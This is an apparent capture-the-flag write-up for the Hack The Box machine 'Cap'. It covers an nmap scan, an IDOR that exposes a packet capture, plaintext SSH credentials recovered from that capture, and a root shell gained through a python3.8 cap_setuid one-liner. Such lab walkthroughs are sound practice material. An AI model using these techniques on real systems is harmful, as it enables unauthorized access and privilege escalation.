CAP

Scanning

NMAP

➜  ~ nmap -T4 cap.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 12:43 EDT
Nmap scan report for cap.htb (10.10.10.245)
Host is up (0.29s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 23.85 seconds

Enumeration

port 80

dashboard of Network monitoring system

dig into the app to find more stuff ...

download cap file to analyze it using wireshark ...

after download i can't find anything interesting

so lets try to find anther CAP file but How !!

IDOR is the Ket in this case ...

change URL to http://cap.htb/data/0

Download CAP ...

time to have some fun

➜  Downloads wireshark 0.pcap

following streams find this credentials

Credentials nathan:Buck3tH4TF0RM3!

login as nathan using SSH

• USER SHELL ACCESS

Privilege Escalation

taking capabilities path ...

first list theme

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip "cap_setuid"

we can set user ID using python

./python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

you can find this at GTFObin

• ROOT SHELL ACCESS